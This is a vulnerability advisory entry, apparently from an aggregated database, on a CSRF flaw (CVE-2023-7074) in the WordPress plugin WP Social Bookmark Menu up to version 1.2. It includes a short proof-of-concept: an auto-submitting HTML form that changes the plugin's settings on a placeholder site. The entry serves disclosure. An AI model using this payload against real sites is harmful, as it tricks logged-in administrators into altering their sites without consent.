Lucene search
Daniel RufWPEX-ID:7906C349-97B0-4D82-AEF0-97A1175AE88EHistoryJan 03, 2024 - 12:00 a.m.
WP Social Bookmark Menu <= 1.2 - Settings Update via CSRF
2024-01-0300:00:00
Daniel Ruf
41
wordpress
csrf
security vulnerability
form submission
cross-site request forgery
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
<form action="https://example.com/wp-admin/options-general.php?page=wp-social-bookmark-menu.php" method="POST">
<input type="text" name="flag_save" value="1">
<input type="text" name="position" value="onthebottom">
</form>
<script>
document.forms[0].submit();
</script>Related
cvelist
cvelist
CVE-2023-7074 WP Social Bookmark Menu <= 1.2 - Settings Update via CSRF
2024-01-29 14:44:15
cve
cve
CVE-2023-7074
2024-01-29 15:15:09
nvd
nvd
CVE-2023-7074
2024-01-29 15:15:09
prion
prion
Cross site request forgery (csrf)
2024-01-29 15:15:00
wpvulndb
wpvulndb
WP Social Bookmark Menu <= 1.2 - Settings Update via CSRF
2024-01-03 00:00:00
wordfence
wordfence
AI Score
9.4
Confidence
High
EPSS
0.001
Percentile
32.5%
Related for WPEX-ID:7906C349-97B0-4D82-AEF0-97A1175AE88E